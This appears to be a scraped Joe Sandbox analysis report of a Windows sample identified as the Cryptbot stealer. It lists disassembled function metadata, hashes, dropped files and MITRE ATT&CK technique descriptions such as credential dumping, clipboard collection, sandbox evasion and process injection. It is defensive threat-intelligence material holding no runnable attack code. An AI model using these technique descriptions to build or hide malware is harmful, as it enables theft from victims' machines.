Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 6c8ab58c933468aacaca344c6079f7ef3f05fe66c1c3c6595545c37489672683
Instruction ID: b549288e63eb71ff9b33d4efb173fffa414c7418bd3331d2a5d8a946112047fc
Opcode Fuzzy Hash: 6c8ab58c933468aacaca344c6079f7ef3f05fe66c1c3c6595545c37489672683
Instruction Fuzzy Hash: B9E13674A056098FCB00DF6CC1809AEFBF1BF85314B118A69D895DBB64E735E905CF92

Function 6C2CE1F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89stringCOMMON

Download Yara Rule

APIs

strerror.MSVCRT ref: 6C2CE1FE
strlen.MSVCRT ref: 6C2CE211

Strings

basic_string: construction from null is not valid, xrefs: 6C2CE233

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: strerrorstrlen
String ID: basic_string: construction from null is not valid
API String ID: 960536887-2991274800
Opcode ID: eae5160bd33934ce78d4955c97bf6b49a4a594b8b95a044ad97b9852bfd22304
Instruction ID: f0b905a34d6f318f04ff620e1aae6502566b03961109d005d0ce449b28f5a1ca
Opcode Fuzzy Hash: eae5160bd33934ce78d4955c97bf6b49a4a594b8b95a044ad97b9852bfd22304
Instruction Fuzzy Hash: 1E115472B045008F8700FF3DC94149AB7F5AB8A214F44CA69DC8887708E634D5188FE3

Function 6C2C3616 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C2C3567
fputc.MSVCRT ref: 6C2C35D7
memset.MSVCRT ref: 6C2C3692

Strings

o, xrefs: 6C2C362E

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: o
API String ID: 2944404495-252678980
Opcode ID: 70f9009819c30ed6982fd80218ea7a036d91aa79bbb5e6e144e921cc07d2ecdd
Instruction ID: 4136c52f5d2c09f4022cbe91fbabec86ed04f54ef74cc3d470c07805c9d2db49
Opcode Fuzzy Hash: 70f9009819c30ed6982fd80218ea7a036d91aa79bbb5e6e144e921cc07d2ecdd
Instruction Fuzzy Hash: F7311872A0860A8FC740CF68C1807D9BBF1BB4C395F158B59ED99ABB41E734E905CB42

Function 00AC2F46 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 00AC2E97
fputc.MSVCRT ref: 00AC2F07
memset.MSVCRT ref: 00AC2FC2

Strings

o, xrefs: 00AC2F5E

Memory Dump Source

Source File: 00000004.00000002.2951693588.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000004.00000002.2951678920.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951709627.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951725080.0000000000ACE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951741403.0000000000AD1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac0000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: o
API String ID: 2944404495-252678980
Opcode ID: d1991d27a04d65bd7075c62f110e734cf744bc34d9a2ff6285541d999189f403
Instruction ID: b929fb1140dec05bc61246d557ab4e6e5a7769a066e180d4ea1882ec8b16da74
Opcode Fuzzy Hash: d1991d27a04d65bd7075c62f110e734cf744bc34d9a2ff6285541d999189f403
Instruction Fuzzy Hash: 8D312876904209CFCB11CF68C194B9ABBF1BF58750F26865DD98AAB701E734ED40CB94

Function 6C2C3AF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C2C3A5F
fputc.MSVCRT ref: 6C2C3AC1

Strings

@, xrefs: 6C2C3AFA

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: fputc
String ID: @
API String ID: 1992160199-2766056989
Opcode ID: 4ceeb5be7b06ab83894e5669f94d5ac76a8e9207d24777a966ec28ddf3749335
Instruction ID: bf20ecb0b254f03ce8dc57371d02e9011f634759fcd03001cb759f3a783b9506
Opcode Fuzzy Hash: 4ceeb5be7b06ab83894e5669f94d5ac76a8e9207d24777a966ec28ddf3749335
Instruction Fuzzy Hash: 25110DB1B152098BCB44DF18C5807C57BB1BF45309F258B59ED995FB4AD334E811CB86

Function 00AC3424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 00AC338F
fputc.MSVCRT ref: 00AC33F1

Strings

@, xrefs: 00AC342A

Memory Dump Source

Source File: 00000004.00000002.2951693588.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000004.00000002.2951678920.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951709627.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951725080.0000000000ACE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951741403.0000000000AD1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac0000_service123.jbxd

Similarity

API ID: fputc
String ID: @
API String ID: 1992160199-2766056989
Opcode ID: 0837171a8a86bca28f46350b1f324809a3657fdd6de56afd08bfd6ae8b32df6d
Instruction ID: 303ce2197d655d57ff018e48550972e3fe8555d9b0af5a8358df16489b517257
Opcode Fuzzy Hash: 0837171a8a86bca28f46350b1f324809a3657fdd6de56afd08bfd6ae8b32df6d
Instruction Fuzzy Hash: 6C11D6B2A042408BCF158F29C184BA97BB1BB45704F26C55DDD899F34ADB34ED00CB44

Function 00AC18B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00AC191E

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00AC18FF
Unknown error, xrefs: 00AC18B2

Memory Dump Source

Source File: 00000004.00000002.2951693588.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000004.00000002.2951678920.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951709627.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951725080.0000000000ACE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951741403.0000000000AD1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac0000_service123.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 809ce366ddfa5fccd6accd9d8c0b979b849068a97a663c68eabc5cbd8f7556c6
Instruction ID: 61bee5f54cee31d52200e935fabc09f0c7fda8f7fa911c652e03f75f9a52a2a7
Opcode Fuzzy Hash: 809ce366ddfa5fccd6accd9d8c0b979b849068a97a663c68eabc5cbd8f7556c6
Instruction Fuzzy Hash: B601D670408B45CBD700AF15E58892ABFF1FF89354F464C9CE5C846269CB32D8A8C743

Function 6C2D77B1 Relevance: 5.1, APIs: 4, Instructions: 128stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2D77D3

Part of subcall function 6C324050: memcpy.MSVCRT(?,?,?,?,-00000001,?,?,6C2D77E6), ref: 6C3240B3

strlen.MSVCRT ref: 6C2D7844
strlen.MSVCRT ref: 6C2D78B2
strlen.MSVCRT ref: 6C2D7926

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: strlen$memcpy
String ID:
API String ID: 3396830738-0
Opcode ID: 736930072a41430f7c17218cb909d4189b1977ad7053b5cf8bc2ded0b175500c
Instruction ID: edaec7dc07dcdbf773fef5b156ac2632f3caa8e4de7fc88a420ad49cea0a8112
Opcode Fuzzy Hash: 736930072a41430f7c17218cb909d4189b1977ad7053b5cf8bc2ded0b175500c
Instruction Fuzzy Hash: 7F5126B1A05A118FCB00EF28C098A5DFBF5BF45708F4185ADD8919F724CB35A849CF82

Function 6C2C8080 Relevance: 5.1, APIs: 4, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,00000002,?,6C2C81A1), ref: 6C2C80A7
InitializeCriticalSection.KERNEL32(?,?,00000002,?,6C2C81A1), ref: 6C2C80E4
InitializeCriticalSection.KERNEL32(?,?,?,00000002,?,6C2C81A1), ref: 6C2C80F0
EnterCriticalSection.KERNEL32(?,?,00000002,?,6C2C81A1), ref: 6C2C8118

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: CriticalSection$Initialize$EnterSleep
String ID:
API String ID: 1117354567-0
Opcode ID: 05a4f164213f0062c09f1daff438d2326be5b842424e86ab5e8ad265ea4b314d
Instruction ID: 592db56c0e6aca8f6c764b75dd30ceec7de166ce3e308c0cc0775af7cb98b381
Opcode Fuzzy Hash: 05a4f164213f0062c09f1daff438d2326be5b842424e86ab5e8ad265ea4b314d
Instruction Fuzzy Hash: C3115EB27066198ADF40AB2C948665E77F8AB07358F514A26D882C7604EA71E584CAD3

Function 00AC6B60 Relevance: 5.1, APIs: 4, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,?,00AC6C81,?,?,?,?,?,?,00000000,00AC4F24), ref: 00AC6B87
InitializeCriticalSection.KERNEL32(?,?,?,?,00AC6C81,?,?,?,?,?,?,00000000,00AC4F24), ref: 00AC6BC4
InitializeCriticalSection.KERNEL32(?,?,?,?,?,00AC6C81,?,?,?,?,?,?,00000000,00AC4F24), ref: 00AC6BD0
EnterCriticalSection.KERNEL32(?,?,?,?,00AC6C81,?,?,?,?,?,?,00000000,00AC4F24), ref: 00AC6BF8

Memory Dump Source

Source File: 00000004.00000002.2951693588.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000004.00000002.2951678920.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951709627.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951725080.0000000000ACE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951741403.0000000000AD1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac0000_service123.jbxd

Similarity

API ID: CriticalSection$Initialize$EnterSleep
String ID:
API String ID: 1117354567-0
Opcode ID: bcffc9df9fa7dc0861b1c890a9d3e58f199f5be8c560d7a04ced43e770dafc08
Instruction ID: 682d850a16ce02ae719e20558dace7a2f87d90932d40923ddaff2f1cbe7f30cf
Opcode Fuzzy Hash: bcffc9df9fa7dc0861b1c890a9d3e58f199f5be8c560d7a04ced43e770dafc08
Instruction Fuzzy Hash: 21115BB15081408EDB24FBBCA9C5E6AB7E4EB00340F17093DC486C3210EA31EC95C796

Function 6C2BAB50 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 6C2BAB5E
TlsGetValue.KERNEL32 ref: 6C2BAB85
GetLastError.KERNEL32 ref: 6C2BAB8C
LeaveCriticalSection.KERNEL32 ref: 6C2BABAC

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: a1acf4e3569c9c2f461c0654e6bf92a736fdcdaae5acfcb2366a4bc1a4f96193
Instruction ID: a0bdf0742d7d078908d3aa6ee503aa6e5b999f1a27a50bbcb60997dd51e00f92
Opcode Fuzzy Hash: a1acf4e3569c9c2f461c0654e6bf92a736fdcdaae5acfcb2366a4bc1a4f96193
Instruction Fuzzy Hash: 3BF0C8B6A0030ACFDB00BF79D4C594A7B78EB56298B060168EE5557309DA30F548CBA3

Function 00AC2000 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00AC21D3,?,?,?,?,?,00AC17E8), ref: 00AC200E
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00AC21D3,?,?,?,?,?,00AC17E8), ref: 00AC2035
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00AC21D3,?,?,?,?,?,00AC17E8), ref: 00AC203C
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00AC21D3,?,?,?,?,?,00AC17E8), ref: 00AC205C

Memory Dump Source

Source File: 00000004.00000002.2951693588.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000004.00000002.2951678920.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951709627.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951725080.0000000000ACE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951741403.0000000000AD1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac0000_service123.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: a76d26dd476a7cf3f54524c4271ac588df288f04ad66b81b8a8be7603d423ed5
Instruction ID: 1a6cd82f289c0c2b9ca2ff3e6029c27f3dc890b805ba9d7692439301c5ef27ed
Opcode Fuzzy Hash: a76d26dd476a7cf3f54524c4271ac588df288f04ad66b81b8a8be7603d423ed5
Instruction Fuzzy Hash: B3F081755003008FDB20FFB89884E1ABBB4EA14340B0B453DDD4557214D730AC16CBA6

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Cryptbot

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\service123.exe

C:\Users\user\AppData\Local\Temp\vinthoOIUgUISlONHmyI.dll

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Windows Analysis Report
file.exe

Function 6C2B14B0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 121
COMMON

Function 00AC116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Function 00AC15B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Function 6C2C9C22 Relevance: 15.1, APIs: 10, Instructions: 110
sleepclipboardCOMMON

Function 00AC81E0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 116
libraryloaderCOMMON

Function 00AC8230 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 62
libraryloaderCOMMON

Function 00AC13C9 Relevance: 12.1, APIs: 8, Instructions: 109
stringCOMMON

Function 00AC11A3 Relevance: 10.6, APIs: 7, Instructions: 115
sleepstringCOMMON

Function 00AC1160 Relevance: 9.1, APIs: 6, Instructions: 131
sleepstringCOMMON

Function 6C2C9B70 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
sleepsynchronizationclipboardCOMMON

Function 00AC1296 Relevance: 5.1, APIs: 4, Instructions: 80
stringCOMMON

